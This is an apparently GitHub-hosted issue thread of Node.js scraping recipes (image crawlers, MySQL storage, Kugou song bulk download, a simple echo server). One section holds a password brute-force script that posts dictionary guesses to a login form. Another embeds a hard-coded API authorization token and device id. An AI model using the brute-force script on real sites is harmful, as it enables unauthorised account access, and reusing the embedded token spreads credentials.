node原生模块爬虫和request爬虫方案
Wscats opened this issue · 5 comments
Wscats commented
原生模块爬虫
//原生http模块,用于请求文件或者创建服务器
var http = require("http");
//原生fs模块,用于读写文件
var fs = require("fs")
//调用cheerio模块,类似于jquery
var cheerio = require("cheerio")
//调用mysql第三方模块
var mysql = require("mysql")
//进行数据库连接
// Settings for the local MySQL database that receives the scraped image URLs.
var dbConfig = {
  database: 'laoyao',
  host: 'localhost', // localhost
  password: '123456789',
  user: 'test'
};
var connection = mysql.createConnection(dbConfig);
// Open the connection right away; later queries are issued on it.
connection.connect();
//此函数用于获取需要被爬虫的网页DOM结构
/**
 * Fetch a page over HTTP and hand its full body to `callback` as a string.
 *
 * The response is decoded as UTF-8 by the stream itself so that a multi-byte
 * character split across two chunks is not corrupted by per-chunk string
 * conversion. Request and response errors are logged instead of surfacing as
 * unhandled 'error' events; in that case `callback` is not invoked.
 *
 * @param {string} url - Absolute http:// URL of the page to fetch.
 * @param {function(string): void} callback - Receives the complete body.
 */
function download(url, callback) {
  http.get(url, function(res) {
    var data = "";
    // Let the stream decode: `data += chunk` on raw Buffers would decode each
    // chunk separately and break characters that straddle a chunk boundary.
    res.setEncoding('utf8');
    res.on('data', function(chunk) {
      data += chunk;
    });
    res.on('end', function() {
      callback(data);
    });
    res.on('error', function(err) {
      console.error('download failed while reading ' + url + ': ' + err.message);
    });
  }).on('error', function(err) {
    // Without this listener a DNS/connection failure would crash the process.
    console.error('download failed for ' + url + ': ' + err.message);
  });
}
// Crawl the landing page, record every image URL in MySQL, then download them.
download("http://www.mmjpg.com/", function(data) {
  // Hand the markup to cheerio, which offers a jQuery-like API over the DOM.
  var $ = cheerio.load(data);
  var imgArr = [];
  // Walk every <img> and store its source.
  $('img').each(function(index, ele) {
    var src = $(ele).attr("src");
    // <img> tags without a src would otherwise be stored as the text
    // "undefined" and later passed to the downloader.
    if (!src) {
      return;
    }
    // Use a placeholder so the driver escapes the value: `src` comes from a
    // remote page and must never be concatenated into the SQL text.
    connection.query('INSERT INTO `meizi`(`src`) VALUES (?)', [src], function(error, results, fields) {
      if (error) throw error;
    });
    imgArr.push(src);
  });
  // Start downloading the collected images.
  downloadImg(imgArr)
})
// Index of the next image to download. It is module-level because the
// recursive calls share it and it doubles as the output file number.
var i = 0;

/**
 * Download the images in `imgArr` one after another into `img/<index>.jpg`.
 *
 * The next download starts only after the current file has been completely
 * written (or has failed), so at most one transfer is in flight. Entries that
 * are missing, malformed, or fail to download are logged and skipped.
 *
 * @param {Array<string>} imgArr - Absolute http:// image URLs.
 */
function downloadImg(imgArr) {
  // Stop before touching the network or the file system once every entry has
  // been handled (this also covers an empty list).
  if (i >= imgArr.length) {
    return;
  }
  var index = i;
  var url = imgArr[index];
  var advanced = false;

  // Move on to the next entry exactly once, whichever event fires first.
  function next() {
    if (advanced) {
      return;
    }
    advanced = true;
    i++;
    downloadImg(imgArr);
  }

  // http.get(undefined) would silently request localhost, so reject
  // non-string entries explicitly.
  if (typeof url !== 'string' || url === '') {
    console.error('skipping image ' + index + ': missing src');
    next();
    return;
  }

  var req;
  try {
    req = http.get(url, function(res) {
      // Create the file only once a response has actually arrived.
      var writerStream = fs.createWriteStream('img/' + index + '.jpg');
      // 'finish' fires after all data has been flushed to the file.
      writerStream.on('finish', next);
      writerStream.on('error', function(err) {
        console.error('cannot write image ' + index + ': ' + err.message);
        next();
      });
      res.on('error', function(err) {
        console.error('image ' + index + ' aborted: ' + err.message);
        writerStream.destroy();
        next();
      });
      res.pipe(writerStream);
    });
  } catch (err) {
    // Relative or non-http URLs make http.get throw synchronously.
    console.error('skipping image ' + index + ': ' + err.message);
    next();
    return;
  }
  req.on('error', function(err) {
    console.error('image ' + index + ' request failed: ' + err.message);
    next();
  });
}
Wscats commented
注意要遍历生成多个写入流,不然有可能下载文件写入不成功
// Give every image its own write stream; sharing one stream between
// downloads can leave files incompletely written.
for (const i of imgs.keys()) {
  var imgStream = fs.createWriteStream(`./img/vks${i}.jpg`);
  download(imgs, i, imgStream);
}
完整代码,记得创建img文件夹
var http = require("http");
var fs = require("fs");
//类似于 jQ
const cheerio = require("cheerio");
const queryStr = require("querystring");
// Form-encoded body sent with the POST request.
var postData = queryStr.stringify({
  "msg": "Hello!"
});

// Send the HTTP request, scrape every <img> from the response and download
// each image into ./img/vks<index>.jpg.
var request = http.request({
  hostname: "www.ivsky.com",
  port: 80,
  method: "POST",
  headers: {
    'Content-Type': 'application/x-www-form-urlencoded',
    // Content-Length is measured in bytes; String#length counts UTF-16 code
    // units and is wrong as soon as the body contains non-ASCII characters.
    'Content-Length': Buffer.byteLength(postData)
  }
}, function(response) {
  var datas = "";
  var imgs = [];
  // Decode in the stream so multi-byte characters split across chunks
  // survive the concatenation below.
  response.setEncoding("utf8");
  response.on("data", function(chunk) {
    datas += chunk;
  });
  response.on("end", function() {
    const $ = cheerio.load(datas);
    $("img").each(function(idx, dom) {
      imgs.push($(dom).attr("src"));
    });
    // Create one writable stream per image.
    for (let i = 0; i < imgs.length; i++) {
      // <img> without src: nothing to download, and no empty file either.
      if (typeof imgs[i] !== "string") {
        continue;
      }
      var imgStream = fs.createWriteStream(`./img/vks${i}.jpg`);
      download(imgs, i, imgStream);
    }
  });
});
request.on("error", function(err) {
  console.log('problem with request: ' + err.message);
});
request.write(postData);
// end() must always be called, even with an empty body: it marks the request
// as complete.
request.end();
/**
 * Download `imgs[i]` over HTTP and pipe the response into `imgStream`.
 *
 * Failures (missing or malformed URL, connection or response error) are
 * logged and the target stream is destroyed so its resources are released,
 * instead of throwing or raising an unhandled 'error' event.
 *
 * @param {Array<string>} imgs - Image URLs collected from the page.
 * @param {number} i - Index of the URL to download.
 * @param {stream.Writable} imgStream - Destination for the image bytes.
 */
function download(imgs, i, imgStream) {
  var url = imgs[i];

  // Report the failure and release the destination stream.
  function fail(reason) {
    console.error('image ' + i + ' download failed: ' + reason);
    imgStream.destroy();
  }

  // http.get(undefined) would silently request localhost.
  if (typeof url !== 'string' || url === '') {
    fail('missing src');
    return;
  }

  var req;
  try {
    req = http.get(url, function(res) {
      res.on('error', function(err) {
        fail(err.message);
      });
      res.pipe(imgStream);
    });
  } catch (err) {
    // Relative or non-http URLs make http.get throw synchronously.
    fail(err.message);
    return;
  }
  req.on('error', function(err) {
    fail(err.message);
  });
}
//注意加end方法 结束请求
//req.end()必须被调用,即使没有在请求体内写入任何数据
//也必须调用。因为这表示已经完成HTTP请求
Wscats commented
在pipe之前添加on('error',fn)可以监听错误,在后面添加on('close',fn)可以监听完成
// Destination file for the download.
var s = fs.createWriteStream(`./images/${f}/${i}`)
var source = request(url);
// Attach the error listener before piping so request failures are reported.
source.on('error', function(err) {
  console.log(err)
});
source.pipe(s);
// 'close' on the destination signals that the download has completed.
s.on('close', function() {
  console.log('成功!')
});
参考文档
Wscats commented
安装并引用request模块
const request = require('request');
详细配置的写法
// Fully configured request: explicit method, URL, headers and form body.
// NOTE(review): the Authorization token and device id below are hard-coded;
// real credentials should come from configuration, not from source.
request({
  method: 'GET',
  url: 'https://xxx/config/all',
  headers: {
    'Host': 'api.veilpark.com',
    'mid': '8678385b7d1eb259377973ee02cd9d52618fc0f7',
    'Accept': '*/*',
    'Authorization': 'token 40101431f0c64e83839a56c2069b1a63jcrk8on1',
    'Proxy-Connection': 'keep-alive',
    'Accept-Language': 'zh-Hans;q=1',
    'cversion': '4400',
    'Content-Type': 'application/json',
    'User-Agent': 'maskpark/4.4 (iPhone; iOS 9.3.1; Scale/2.00)',
    'Connection': 'keep-alive',
    'client': 'ios'
  },
  form: {}
}, (error, response, body) => {
  if (error || !response || response.statusCode !== 200) {
    // Keep the original message but include the cause so failures can be
    // diagnosed.
    console.log("请求出错", error ? error.message : (response && response.statusCode));
    return;
  }
  var info;
  try {
    // A 200 response is not guaranteed to be JSON; an exception thrown inside
    // this callback would otherwise take the process down.
    info = JSON.parse(body);
  } catch (parseError) {
    console.log("请求出错", parseError.message);
    return;
  }
  console.log(info);
})
网页暴力破解
const request = require('request');
const async = require('async');
// Runs `hack` once for every entry of the candidate list via async.each and
// prints 'done' from the final callback.
// NOTE(review): this sends repeated login attempts to a remote service; only
// run it against systems you own or are explicitly authorized to test.
async.each(
// Password dictionary: the candidate values to try
['1', '2', '3'],
(item, callback) => {
hack(item, function() {
callback(null)
})
},
() => {
console.log('done');
}
);
/**
 * Submit one login form with the given password and log the outcome.
 *
 * NOTE(review): only for systems you own or are explicitly authorized to test.
 *
 * @param {string} password - Value sent as the `PassWord` form field.
 * @param {Function} cb - Called with no arguments once the attempt has been logged.
 */
function hack(password, cb) {
request({
method: 'POST',
url: 'http://xxx/login',
headers: {
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36',
},
form: {
'AdminName': 'xxxx',
'PassWord': password
}
}, (error, response, body) => {
// A non-empty body is logged as a failed attempt, anything else as a
// success. `error` is never inspected, so a failed request (no body) also
// ends up in the else branch.
if(body) {
console.log("破解失败", "无可用密码");
} else {
console.log("破解成功", password);
}
cb()
})
}
其他可以做的思路
Wscats commented
酷狗批量下载音乐
参考1
var request = require('request');
var cheerio = require('cheerio');
var fs = require('fs');
// Scrape a singer page, resolve every song hash to its play URL and save the
// audio as "<audio_name>.mp3" in the current directory.
request('http://www.kugou.com/yy/singer/home/3060.html', function(error, response, body) {
  if (error || !body) {
    console.error('failed to load singer page: ' + (error ? error.message : 'empty body'));
    return;
  }
  var $ = cheerio.load(body);
  var arr = $('.song_hid');
  for (var num = 0; num < arr.length; num = num + 1) {
    var value = $(arr[num]).attr("value");
    // Skip elements without a value attribute instead of crashing on them.
    if (typeof value !== 'string') {
      continue;
    }
    console.log(value);
    // Length of the whole value string.
    var length = value.length;
    console.log(length);
    // Position of the first "|" separator.
    var index = value.indexOf("|");
    console.log(index);
    if (index === -1) {
      // No separator: there is no hash to extract.
      continue;
    }
    // The hash sits between the first "|" and the last 7 characters.
    var hash = value.substring(index + 1, length - 7);
    console.log(hash);
    request('http://www.kugou.com/yy/index.php?r=play/getdata&hash=' + encodeURIComponent(hash), function(error, response, body) {
      if (error) {
        console.error('failed to load play data: ' + error.message);
        return;
      }
      var data;
      try {
        // Parse once; the body is not guaranteed to be valid JSON.
        data = JSON.parse(body).data;
      } catch (parseError) {
        console.error('unexpected play data response: ' + parseError.message);
        return;
      }
      if (!data || !data.play_url) {
        console.error('play data response contains no play_url');
        return;
      }
      console.log(data.play_url);
      // audio_name comes from the remote server: strip characters that are
      // path separators or invalid in file names before using it as a path.
      var fileName = String(data.audio_name).replace(/[\\\/:*?"<>|]/g, '_') + '.mp3';
      var target = fs.createWriteStream(fileName);
      target.on('error', function(err) {
        console.error('cannot write ' + fileName + ': ' + err.message);
      });
      request(data.play_url).on('error', function(err) {
        console.error('download of ' + fileName + ' failed: ' + err.message);
        target.destroy();
      }).pipe(target);
    });
  }
})
参考2
//1.爬取歌手网页
//2.分析网页,并获取该歌手所有歌曲的id
//3.根据id来拼接url,获取歌曲的下载地址
//4.执行下载
var request = require("request");
var cheerio = require("cheerio");
var fs = require("fs");
var mysql = require('mysql');
// Connection settings for the `kugou` database that stores song names and URLs.
var kugouDbConfig = {
  database: 'kugou',
  host: 'localhost',
  password: '123456',
  user: 'wscats'
};
var connection = mysql.createConnection(kugouDbConfig);
// Establish the connection before any query is issued.
connection.connect();
// Scrape the singer page, look up the play URL of every song and store the
// (name, url) pair in the `song` table.
request("http://www.kugou.com/singer/3060.html", function(err, res, body) {
  const $ = cheerio.load(body);
  const songInputs = $(".song_hid");
  songInputs.each(function(i, e) {
    // The value attribute has the form "<name>|<hash>...".
    const parts = $(e).attr("value").split("|");
    const name = parts[0];
    const link = parts[1];
    console.log(link);
    const playDataUrl = `http://wwwapi.kugou.com/yy/index.php?r=play/getdata&hash=${link}`;
    request(playDataUrl, function(err, res, body) {
      // Nothing to store when the lookup returned no body.
      if (!body) {
        return;
      }
      const url = JSON.parse(body).data.play_url;
      console.log(url);
      const row = {
        name: name,
        url: url
      };
      // "SET ?" lets the driver escape the object's values.
      connection.query('INSERT INTO song SET ?', row, function(error, results, fields) {
        if (error) throw error;
        console.log(results);
      });
    });
  });
})
Wscats commented
原生http.request模拟客户端请求
const http = require('http');
const querystring = require('querystring');
// Form-encoded request body.
const postData = querystring.stringify({ 'msg': 'helloworld' });

// Headers for the POST; the length is given in bytes.
const requestHeaders = {
  'Content-Type': 'application/x-www-form-urlencoded',
  'Content-Length': Buffer.byteLength(postData)
};

const options = {
  hostname: 'localhost',
  port: 8877,
  path: '/',
  method: 'POST',
  headers: requestHeaders
};

// Log the status, the headers and every body chunk of the response.
function logResponse(res) {
  console.log(`状态码: ${res.statusCode}`);
  console.log(`响应头: ${JSON.stringify(res.headers)}`);
  res.setEncoding('utf8');
  res.on('data', function(chunk) {
    console.log(`响应主体: ${chunk}`);
  });
  res.on('end', function() {
    console.log('响应中已无数据');
  });
}

const req = http.request(options, logResponse);
req.on('error', function(e) {
  console.error(`请求遇到问题: ${e.message}`);
});
// Write the data to the request body, then finish the request.
req.write(postData);
req.end();
原生http.createServer创建服务器
const http = require('http');
const fs = require('fs');
// Echo server: answers every request with the request's own body and sets
// permissive CORS headers on the response.
function echoWithCors(req, res) {
  const corsHeaders = [
    ['Access-Control-Allow-Origin', '*'],
    ['Access-Control-Allow-Headers', 'Origin, X-Requested-With, Content-Type, Accept']
  ];
  for (const [headerName, headerValue] of corsHeaders) {
    res.setHeader(headerName, headerValue);
  }
  // Stream the incoming body straight back to the client.
  req.pipe(res);
}

const echoServer = http.createServer(echoWithCors);
echoServer.listen(8877);